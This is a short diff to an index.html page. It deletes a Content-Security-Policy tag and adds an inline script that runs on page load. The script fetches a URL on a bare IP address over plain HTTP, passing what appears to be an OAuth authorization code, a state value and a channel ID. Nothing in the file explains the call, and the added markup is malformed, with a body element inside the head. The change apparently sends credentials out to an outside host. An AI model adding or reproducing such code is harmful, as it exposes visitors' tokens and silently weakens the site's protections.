--- a/index.html
+++ b/index.html
@@ -1,7 +1,18 @@
 
 <html>
 <head>
-    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests" />
+    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+    <script>
+    function get_func(url) {
+      fetch(url)
+      .then(function(response) {
+        return response.text();
+      })}
+    get_func('http://133.18.228.169:8884/call_data?code=Y58xnYnzT9JjorZpV6X6JqQPfEBEN1&state=1038694701718569000&channel=1038696504078106705')
+    </script>
+  <body>
+  </body>
+
     <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
     <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
     <meta name="viewport" content="width=device-width">
